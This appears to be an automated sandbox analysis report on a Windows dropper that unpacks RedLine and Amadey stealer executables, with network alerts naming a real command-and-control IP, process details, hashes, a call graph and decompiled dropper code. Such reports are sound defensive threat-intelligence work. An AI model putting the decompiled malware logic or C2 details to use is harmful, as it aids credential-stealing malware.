msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/26/23-11:40:50.159297 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49697 | 19062 | 192.168.2.3 | 83.97.73.122
05/26/23-11:40:32.455619 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49697 | 19062 | 192.168.2.3 | 83.97.73.122
05/26/23-11:40:36.975680 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 19062 | 49697 | 83.97.73.122 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                      May 26, 2023 11:40:46.880130053 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.937726021 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.985423088 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.030561924 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.087986946 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.088042021 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.141644955 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.356575966 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.413834095 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.414064884 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.414083004 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.414403915 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.469794989 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.487380028 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.545372009 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.594831944 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:50.101281881 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:50.158529997 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:50.158723116 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:50.159296989 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:50.216737986 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:50.262445927 CEST4969719062192.168.2.383.97.73.122

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:11:40:16
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                                                      File size:782336 bytes
                                                                                                                                                                                                      MD5 hash:1DF346C349B9B71B11825690BE73E635
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                      Start time:11:40:17
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      Imagebase:0x210000
                                                                                                                                                                                                      File size:457216 bytes
                                                                                                                                                                                                      MD5 hash:A9A0FDF699EB764206C59FF3CA3FAC53
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                      Start time:11:40:17
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      Imagebase:0xbc0000
                                                                                                                                                                                                      File size:281600 bytes
                                                                                                                                                                                                      MD5 hash:4D67FD4D3D62A45215D1FBDF9CA87397
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                      Start time:11:40:18
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:186366 bytes
                                                                                                                                                                                                      MD5 hash:1BE37E0816A88025F557178CA7FC03C8
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 39%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                      Start time:11:40:18
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:11:40:19
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
                                                                                                                                                                                                      Imagebase:0xe0000
                                                                                                                                                                                                      File size:98912 bytes
                                                                                                                                                                                                      MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:11:40:19
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                                                                                                                                                                                                      Imagebase:0xe80000
                                                                                                                                                                                                      File size:148489 bytes
                                                                                                                                                                                                      MD5 hash:927C5B1DEF98D855184A0ED56D8A2787
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.361157707.0000000000E82000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: ditekSHen
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 78%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:11:40:26
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff658210000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                      Start time:11:40:35
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff658210000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                      Start time:11:40:43
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff658210000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.7%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:30.7%
                                                                                                                                                                                                        Total number of Nodes:962
                                                                                                                                                                                                        Total number of Limit Nodes:25
a94917 2891->2894 2892->2887 2893 a94962 CharNextA 2893->2894 2894->2892 2894->2893 2895 a94953 CreateDirectoryA 2894->2895 2895->2893 2897 a9255b 2896->2897 2898 a92510 2896->2898 2900 a96ce0 4 API calls 2897->2900 2899 a9658a CharPrevA 2898->2899 2901 a92522 WritePrivateProfileStringA _lopen 2899->2901 2902 a92569 2900->2902 2901->2897 2903 a92548 _llseek _lclose 2901->2903 2902->2658 2903->2897 2905 a91b25 2904->2905 3009 a91a84 2905->3009 2907 a91b57 2908 a9658a CharPrevA 2907->2908 2910 a91b8c 2907->2910 2908->2910 2909 a966c8 2 API calls 2911 a91bd1 2909->2911 2910->2909 2912 a91bd9 CompareStringA 2911->2912 2913 a91d73 2911->2913 2912->2913 2914 a91bf7 GetFileAttributesA 2912->2914 2915 a966c8 2 API calls 2913->2915 2916 a91c0d 2914->2916 2917 a91d53 2914->2917 2918 a91d7d 2915->2918 2916->2917 2924 a91a84 2 API calls 2916->2924 2919 a91d64 2917->2919 2920 a91df8 LocalAlloc 2918->2920 2921 a91d81 CompareStringA 2918->2921 2922 a944b9 20 API calls 2919->2922 2920->2919 2923 a91e0b GetFileAttributesA 2920->2923 2921->2920 2930 a91d9b 2921->2930 2925 a91d6c 2922->2925 2926 a91e45 2923->2926 2933 a91e1d 2923->2933 2927 a91c31 2924->2927 2929 a96ce0 4 API calls 2925->2929 3015 a92aac 2926->3015 2928 a91c50 LocalAlloc 2927->2928 2934 a91a84 2 API calls 2927->2934 2928->2919 2931 a91c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2931 2932 a91ea1 2929->2932 2930->2930 2935 a91dbe LocalAlloc 2930->2935 2938 a91cf8 2931->2938 2942 a91cc2 2931->2942 2932->2684 2933->2926 2934->2928 2935->2919 2939 a91de1 2935->2939 2940 a91d09 GetShortPathNameA 2938->2940 2943 a91d23 2938->2943 2941 a9171e _vsnprintf 2939->2941 2940->2943 2941->2942 2942->2925 2944 a9171e _vsnprintf 2943->2944 2944->2942 2946 a9209a 2945->2946 2954 a92256 2945->2954 2948 a9171e _vsnprintf 2946->2948 2951 a920dc 2946->2951 2947 a96ce0 4 API calls 2949 a92263 2947->2949 2950 a920af RegQueryValueExA 2948->2950 2949->2684 2950->2946 2950->2951 2952 a920fb GetSystemDirectoryA 2951->2952 2953 
a920e4 RegCloseKey 2951->2953 2955 a9658a CharPrevA 2952->2955 2953->2954 2954->2947 2956 a9211b LoadLibraryA 2955->2956 2957 a92179 GetModuleFileNameA 2956->2957 2958 a9212e GetProcAddress FreeLibrary 2956->2958 2960 a921de RegCloseKey 2957->2960 2963 a92177 2957->2963 2958->2957 2959 a9214e GetSystemDirectoryA 2958->2959 2961 a92165 2959->2961 2959->2963 2960->2954 2962 a9658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 a921b7 LocalAlloc 2963->2964 2965 a921cd 2964->2965 2966 a921ec 2964->2966 2967 a944b9 20 API calls 2965->2967 2968 a9171e _vsnprintf 2966->2968 2967->2960 2969 a92218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2954 2972 a94016 CreateProcessA 2971->2972 2983 a94106 2971->2983 2973 a94041 WaitForSingleObject GetExitCodeProcess 2972->2973 2974 a940c4 2972->2974 2977 a94070 2973->2977 2976 a96285 GetLastError 2974->2976 2975 a96ce0 4 API calls 2978 a94117 2975->2978 2979 a940c9 GetLastError FormatMessageA 2976->2979 3042 a9411b 2977->3042 2978->2684 2981 a944b9 20 API calls 2979->2981 2981->2983 2982 a94096 CloseHandle CloseHandle 2982->2983 2984 a940ba 2982->2984 2983->2975 2984->2983 2986 a964c2 2985->2986 2987 a9658a CharPrevA 2986->2987 2988 a964d8 GetFileAttributesA 2987->2988 2989 a964ea 2988->2989 2990 a96501 LoadLibraryA 2988->2990 2989->2990 2991 a964ee LoadLibraryExA 2989->2991 2992 a96508 2990->2992 2991->2992 2993 a96ce0 4 API calls 2992->2993 2994 a96513 2993->2994 2994->2696 2996 a92289 RegOpenKeyExA 2995->2996 2997 a92381 2995->2997 2996->2997 2999 a922b1 RegQueryValueExA 2996->2999 2998 a96ce0 4 API calls 2997->2998 3000 a9238c 2998->3000 3001 a92374 RegCloseKey 2999->3001 3002 a922e6 memset GetSystemDirectoryA 2999->3002 3000->2670 3001->2997 3003 a9230f 3002->3003 3004 a92321 3002->3004 3006 a9658a CharPrevA 3003->3006 3005 a9171e _vsnprintf 3004->3005 3007 a9233f RegSetValueExA 3005->3007 3006->3004 3007->3001 3010 a91a9a 3009->3010 3012 a91aba 3010->3012 3014 a91aaf 3010->3014 3028 a9667f 3010->3028 3012->2907 3013 
a9667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 a92ad4 GetModuleFileNameA 3015->3016 3019 a92be6 3015->3019 3027 a92b02 3016->3027 3017 a96ce0 4 API calls 3020 a92bf5 3017->3020 3018 a92af1 IsDBCSLeadByte 3018->3027 3019->3017 3020->2925 3021 a92bca CharNextA 3024 a92bd3 CharNextA 3021->3024 3022 a92b11 CharNextA CharUpperA 3023 a92b8d CharUpperA 3022->3023 3022->3027 3023->3027 3024->3027 3026 a92b43 CharPrevA 3026->3027 3027->3018 3027->3019 3027->3021 3027->3022 3027->3024 3027->3026 3033 a965e8 3027->3033 3031 a96689 3028->3031 3029 a966a5 3029->3010 3030 a96648 IsDBCSLeadByte 3030->3031 3031->3029 3031->3030 3032 a96697 CharNextA 3031->3032 3032->3031 3034 a965f4 3033->3034 3034->3034 3035 a965fb CharPrevA 3034->3035 3036 a96611 CharPrevA 3035->3036 3037 a9660b 3036->3037 3038 a9661e 3036->3038 3037->3036 3037->3038 3039 a9663d 3038->3039 3040 a96634 CharNextA 3038->3040 3041 a96627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 a94132 3042->3043 3045 a9412a 3042->3045 3046 a91ea7 3043->3046 3045->2982 3047 a91ed3 3046->3047 3048 a91eba 3046->3048 3047->3045 3049 a9256d 15 API calls 3048->3049 3049->3047 3051 a91ff0 RegOpenKeyExA 3050->3051 3052 a92026 3050->3052 3051->3052 3053 a9200f RegDeleteValueA RegCloseKey 3051->3053 3052->2320 3053->3052 3120 a919e0 3121 a91a03 3120->3121 3122 a91a24 GetDesktopWindow 3120->3122 3124 a91a16 EndDialog 3121->3124 3125 a91a20 3121->3125 3129 a943d0 6 API calls 3122->3129 3124->3125 3127 a96ce0 4 API calls 3125->3127 3128 a91a7e 3127->3128 3130 a94463 SetWindowPos 3129->3130 3132 a96ce0 4 API calls 3130->3132 3133 a91a33 LoadStringA SetDlgItemTextA MessageBeep 3132->3133 3133->3125 3134 a96a20 __getmainargs 3135 a969b0 3136 a969b5 3135->3136 3144 a96fbe GetModuleHandleW 3136->3144 3138 a969c1 __set_app_type __p__fmode __p__commode 3139 a969f9 3138->3139 3140 a96a0e 3139->3140 3141 a96a02 __setusermatherr 3139->3141 3146 a971ef _controlfp 3140->3146 3141->3140 3143 a96a13 3145 a96fcf 
3144->3145 3145->3138 3146->3143 3147 a934f0 3148 a93504 3147->3148 3149 a935b8 3147->3149 3148->3149 3150 a9351b 3148->3150 3151 a935be GetDesktopWindow 3148->3151 3152 a93671 EndDialog 3149->3152 3153 a93526 3149->3153 3155 a9354f 3150->3155 3156 a9351f 3150->3156 3154 a943d0 11 API calls 3151->3154 3152->3153 3157 a935d6 3154->3157 3155->3153 3159 a93559 ResetEvent 3155->3159 3156->3153 3158 a9352d TerminateThread EndDialog 3156->3158 3161 a9361d SetWindowTextA CreateThread 3157->3161 3162 a935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3157->3162 3158->3153 3160 a944b9 20 API calls 3159->3160 3163 a93581 3160->3163 3161->3153 3164 a93646 3161->3164 3162->3161 3165 a9359b SetEvent 3163->3165 3167 a9358a SetEvent 3163->3167 3166 a944b9 20 API calls 3164->3166 3168 a93680 4 API calls 3165->3168 3166->3149 3167->3153 3168->3149 3169 a96ef0 3170 a96f2d 3169->3170 3172 a96f02 3169->3172 3171 a96f27 ?terminate@ 3171->3170 3172->3170 3172->3171 3173 a97270 _except_handler4_common 3054 a94cc0 GlobalFree 3055 a96f40 SetUnhandledExceptionFilter 3174 a94bc0 3176 a94bd7 3174->3176 3177 a94c05 3174->3177 3175 a94c1b SetFilePointer 3175->3176 3177->3175 3177->3176 3178 a930c0 3179 a930de CallWindowProcA 3178->3179 3180 a930ce 3178->3180 3181 a930da 3179->3181 3180->3179 3180->3181 3182 a963c0 3183 a96407 3182->3183 3184 a9658a CharPrevA 3183->3184 3185 a96415 CreateFileA 3184->3185 3186 a96448 WriteFile 3185->3186 3187 a9643a 3185->3187 3188 a96465 CloseHandle 3186->3188 3190 a96ce0 4 API calls 3187->3190 3188->3187 3191 a9648f 3190->3191 3192 a93100 3193 a93111 3192->3193 3194 a931b0 3192->3194 3196 a93149 GetDesktopWindow 3193->3196 3200 a9311d 3193->3200 3195 a931b9 SendDlgItemMessageA 3194->3195 3198 a93141 3194->3198 3195->3198 3199 a943d0 11 API calls 3196->3199 3197 a93138 EndDialog 3197->3198 3201 a9315d 6 API calls 3199->3201 3200->3197 3200->3198 3201->3198 3202 a94200 3203 a9420b SendMessageA 3202->3203 3204 a9421e 3202->3204 3203->3204 3205 a96c03 3206 
a96c1e 3205->3206 3207 a96c17 _exit 3205->3207 3208 a96c32 3206->3208 3209 a96c27 _cexit 3206->3209 3207->3206 3209->3208 3056 a94cd0 3057 a94d0b 3056->3057 3058 a94cf4 3056->3058 3059 a94d02 3057->3059 3062 a94dcb 3057->3062 3065 a94d25 3057->3065 3058->3059 3060 a94b60 FindCloseChangeNotification 3058->3060 3061 a96ce0 4 API calls 3059->3061 3060->3059 3064 a94e95 3061->3064 3063 a94dd4 SetDlgItemTextA 3062->3063 3066 a94de3 3062->3066 3063->3066 3065->3059 3079 a94c37 3065->3079 3066->3059 3084 a9476d 3066->3084 3069 a94e38 3069->3059 3071 a94980 25 API calls 3069->3071 3073 a94e56 3071->3073 3072 a94b60 FindCloseChangeNotification 3074 a94d99 SetFileAttributesA 3072->3074 3073->3059 3075 a94e64 3073->3075 3074->3059 3093 a947e0 LocalAlloc 3075->3093 3078 a94e6f 3078->3059 3080 a94c4c DosDateTimeToFileTime 3079->3080 3083 a94c88 3079->3083 3081 a94c5e LocalFileTimeToFileTime 3080->3081 3080->3083 3082 a94c70 SetFileTime 3081->3082 3081->3083 3082->3083 3083->3059 3083->3072 3102 a966ae GetFileAttributesA 3084->3102 3086 a9477b 3086->3069 3087 a947cc SetFileAttributesA 3088 a947db 3087->3088 3088->3069 3090 a96517 24 API calls 3091 a947b1 3090->3091 3091->3087 3091->3088 3092 a947c2 3091->3092 3092->3087 3094 a9480f LocalAlloc 3093->3094 3095 a947f6 3093->3095 3098 a94831 3094->3098 3101 a9480b 3094->3101 3096 a944b9 20 API calls 3095->3096 3096->3101 3099 a944b9 20 API calls 3098->3099 3100 a94846 LocalFree 3099->3100 3100->3101 3101->3078 3103 a94777 3102->3103 3103->3086 3103->3087 3103->3090 3104 a94ad0 3112 a93680 3104->3112 3107 a94ae9 3108 a94aee WriteFile 3109 a94b0f 3108->3109 3110 a94b14 3108->3110 3110->3109 3111 a94b3b SendDlgItemMessageA 3110->3111 3111->3109 3113 a93691 MsgWaitForMultipleObjects 3112->3113 3114 a936a9 PeekMessageA 3113->3114 3115 a936e8 3113->3115 3114->3113 3116 a936bc 3114->3116 3115->3107 3115->3108 3116->3113 3116->3115 3117 a936c7 DispatchMessageA 3116->3117 3118 a936d1 PeekMessageA 3116->3118 3117->3118 3118->3116 3210 a93210 
3211 a9328e EndDialog 3210->3211 3212 a93227 3210->3212 3227 a93239 3211->3227 3213 a933e2 GetDesktopWindow 3212->3213 3214 a93235 3212->3214 3216 a943d0 11 API calls 3213->3216 3218 a932dd GetDlgItemTextA 3214->3218 3219 a9324c 3214->3219 3214->3227 3217 a933f1 SetWindowTextA SendDlgItemMessageA 3216->3217 3220 a9341f GetDlgItem EnableWindow 3217->3220 3217->3227 3228 a932fc 3218->3228 3243 a93366 3218->3243 3221 a93251 3219->3221 3222 a932c5 EndDialog 3219->3222 3220->3227 3223 a9325c LoadStringA 3221->3223 3221->3227 3222->3227 3225 a9327b 3223->3225 3226 a93294 3223->3226 3224 a944b9 20 API calls 3224->3227 3231 a944b9 20 API calls 3225->3231 3248 a94224 LoadLibraryA 3226->3248 3230 a93331 GetFileAttributesA 3228->3230 3228->3243 3234 a9337c 3230->3234 3235 a9333f 3230->3235 3231->3211 3233 a932a5 SetDlgItemTextA 3233->3225 3233->3227 3236 a9658a CharPrevA 3234->3236 3237 a944b9 20 API calls 3235->3237 3238 a9338d 3236->3238 3239 a93351 3237->3239 3240 a958c8 27 API calls 3238->3240 3239->3227 3241 a9335a CreateDirectoryA 3239->3241 3242 a93394 3240->3242 3241->3234 3241->3243 3242->3243 3244 a933a4 3242->3244 3243->3224 3245 a933c7 EndDialog 3244->3245 3246 a9597d 34 API calls 3244->3246 3245->3227 3247 a933c3 3246->3247 3247->3227 3247->3245 3249 a943b2 3248->3249 3250 a94246 GetProcAddress 3248->3250 3254 a944b9 20 API calls 3249->3254 3251 a9425d GetProcAddress 3250->3251 3252 a943a4 FreeLibrary 3250->3252 3251->3252 3253 a94274 GetProcAddress 3251->3253 3252->3249 3253->3252 3255 a9428b 3253->3255 3256 a9329d 3254->3256 3257 a94295 GetTempPathA 3255->3257 3261 a942e1 3255->3261 3256->3227 3256->3233 3258 a942ad 3257->3258 3258->3258 3259 a942b4 CharPrevA 3258->3259 3260 a942d0 CharPrevA 3259->3260 3259->3261 3260->3261 3262 a94390 FreeLibrary 3261->3262 3262->3256 3263 a94a50 3264 a94a9f ReadFile 3263->3264 3265 a94a66 3263->3265 3266 a94abb 3264->3266 3265->3266 3267 a94a82 memcpy 3265->3267 3267->3266 3268 a93450 3269 a9345e 3268->3269 3270 a934d3 
EndDialog 3268->3270 3272 a9349a GetDesktopWindow 3269->3272 3276 a93465 3269->3276 3271 a9346a 3270->3271 3273 a943d0 11 API calls 3272->3273 3274 a934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3273->3274 3274->3271 3275 a9348c EndDialog 3275->3271 3276->3271 3276->3275

Callgraph

[Figure: function call graph. Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available.]

Control-flow Graph

C-Code - Quality: 93%
E00A9202A(struct HINSTANCE__* __edx) {
    signed int _v8;
    char _v268;
    char _v528;
    void* _v532;
    int _v536;
    int _v540;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t28;
    long _t36;
    long _t41;
    struct HINSTANCE__* _t46;
    intOrPtr _t49;
    intOrPtr _t50;
    CHAR* _t54;
    void _t56;
    signed int _t66;
    intOrPtr* _t72;
    void* _t73;
    void* _t75;
    void* _t80;
    intOrPtr* _t81;
    void* _t86;
    void* _t87;
    void* _t90;
    _Unknown_base(*)()* _t91;
    signed int _t93;
    void* _t94;
    void* _t95;

    _t79 = __edx;
    _t28 =  *0xa98004; // 0x6298f871
    _v8 = _t28 ^ _t93;
    _t84 = 0x104;
    memset( &_v268, 0, 0x104);
    memset( &_v528, 0, 0x104);
    _t95 = _t94 + 0x18;
    _t66 = 0;
    _t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
    if(_t36 != 0) {
        L24:
        return E00A96CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
    }
    _push(_t86);
    _t87 = 0;
    while(1) {
        E00A9171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
        _t95 = _t95 + 0x10;
        _t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
        if(_t41 != 0) {
            break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
